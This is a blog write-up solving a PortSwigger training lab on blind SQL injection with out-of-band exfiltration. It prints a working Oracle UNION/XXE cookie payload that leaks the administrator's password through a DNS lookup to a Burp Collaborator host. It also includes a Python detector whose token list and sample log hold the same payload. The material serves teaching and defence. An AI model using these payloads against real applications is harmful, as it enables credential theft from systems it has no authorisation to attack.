Introduction
In this article, we will cover the PortSwigger Web Security lab on “Blind SQL injection with out-of-band data exfiltration” step by step with practical examples.
Lab Description
This lab focuses on Blind SQL injection vulnerabilities. The application uses a tracking cookie for analytics and performs SQL queries based on the submitted cookie’s value.
In this lab, the application’s response does not reveal the result of the injected query, so there is no direct impact to observe. However, we can still exploit the blind SQL injection by making the database interact with an external domain, i.e. an out-of-band interaction attack.
The database contains different tables, including a table named “users” that has columns for usernames and passwords. We need to extract the administrator’s credentials and log in to the application.
To perform this attack, you will need a feature called Burp Collaborator in Burp Suite Professional.
Lab Solution
First, access the lab.
We will exploit the lab using SQL injection techniques, along with basic XXE (XML External Entity) techniques.
Intercept the request for the lab’s first (index) page in Burp Suite and send it to Repeater for testing.
TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.BURP-COLLABORATOR-SUBDOMAIN/">+%25remote%3b]>'),'/l')+FROM+dual--
If you have a basic understanding of SQL and XML, you can easily read this payload. It performs a UNION attack and uses an XML external entity to make the database look up a hostname that contains the password from the “users” table where the username is “administrator.” That lookup arrives in Burp Collaborator, which is how we receive the data.
Copy your Burp Collaborator payload (in my case, it is zgj4viy4v0s8sik8hz7tbe9dv41vpk.oastify.com) and substitute it for BURP-COLLABORATOR-SUBDOMAIN in the previous payload.
The final version is as follows:
TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.zgj4viy4v0s8sik8hz7tbe9dv41vpk.oastify.com/">+%25remote%3b]>'),'/l')+FROM+dual--
Place this payload in the TrackingId cookie of the same index page request and send it.
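As an added example for defenders (not part of the lab or this write-up’s original content), the following Python decodes a TrackingId cookie the way the application would and flags the markers of the payload above, pulling out the external host named in the entity declaration so it can be alerted on. The log lines and the host oob.example.net are constructed placeholders.

```python
import re
from urllib.parse import unquote_plus

# Markers of the Oracle out-of-band technique used in this lab, matched
# case-insensitively against the decoded cookie. Any one of them inside an
# analytics cookie is worth an alert.
SUSPICIOUS_TOKENS = ("union select", "extractvalue(", "xmltype(", "<!entity", "<!doctype")

# Attacker-controlled suffix named in the external entity declaration:
#   SYSTEM "http://'||(subquery)||'.<host>/"
# The DNS query the resolver later sees is "<exfiltrated value>.<host>".
ENTITY_HOST_RE = re.compile(
    r'SYSTEM\s+"https?://[^"]*?((?:[A-Za-z0-9-]+\.)+[A-Za-z]{2,})/?"', re.IGNORECASE
)


def inspect_tracking_cookie(raw_value: str) -> dict:
    """Decode one URL-encoded TrackingId value and report injection markers."""
    decoded = unquote_plus(raw_value)  # '+' -> space, %xx -> byte, as the app decodes it
    lowered = decoded.lower()
    hits = [tok for tok in SUSPICIOUS_TOKENS if tok in lowered]
    match = ENTITY_HOST_RE.search(decoded)
    return {
        "suspicious": bool(hits),
        "tokens": hits,
        "oob_host": match.group(1) if match else None,
    }


def scan_cookie_log(lines):
    """Return (raw_cookie, finding) for every log line whose TrackingId looks injected."""
    findings = []
    for line in lines:
        m = re.search(r"TrackingId=([^;\s]+)", line)
        if not m:
            continue
        finding = inspect_tracking_cookie(m.group(1))
        if finding["suspicious"]:
            findings.append((m.group(1), finding))
    return findings


# Constructed sample log lines: a benign cookie, then the lab payload with a
# placeholder collaborator host (oob.example.net is not a real endpoint).
SAMPLE_LOG = [
    "GET / HTTP/1.1 Cookie: TrackingId=Kx9pQ2mL7vZ3RtWe; session=abc",
    "GET / HTTP/1.1 Cookie: TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d\"1.0\"+"
    "encoding%3d\"UTF-8\"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+\"http%3a//'||(SELECT+password+"
    "FROM+users+WHERE+username%3d'administrator')||'.oob.example.net/\">+%25remote%3b]>'),'/l')+FROM+dual--",
]
```

Running scan_cookie_log(SAMPLE_LOG) flags only the second line and reports oob.example.net as the destination of the out-of-band lookup.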
You can see that we received the password in the DNS interaction. I forwarded the request twice because the first time the response was a bit delayed; wait a little and you will get the response in Burp Collaborator.
username=administrator and password=1g80ui39g75a2wvd0hgv
I have successfully logged into the application, solving the PortSwigger Web Security lab on “Blind SQL injection with out-of-band data exfiltration.”
You can learn everything related to web security on our website. We upload the latest articles on web security topics on a daily basis, so stay with us.
To continue studying, check out the next lab, SQL Injection With Filter Bypass Via XML Encoding, but make sure you have completed the current lab before moving on. Good luck!
FAQS
Website security refers to protecting a website or web application from cyberattacks, unauthorized access, or other security threats.
Web application security means protecting a website from cyberattacks. These attacks may include vulnerabilities such as SQL injection, XSS, file inclusion, and others.
It is always good practice to use an up-to-date browser that receives timely updates. Keep your browser plugins up to date, avoid malicious websites and links, always enable two-factor authentication, and be aware of clickjacking.
Searching for someone’s social security number or credit card information on the dark web is illegal and unethical. It is important to always avoid such activities and protect yourself and others from cyber threats.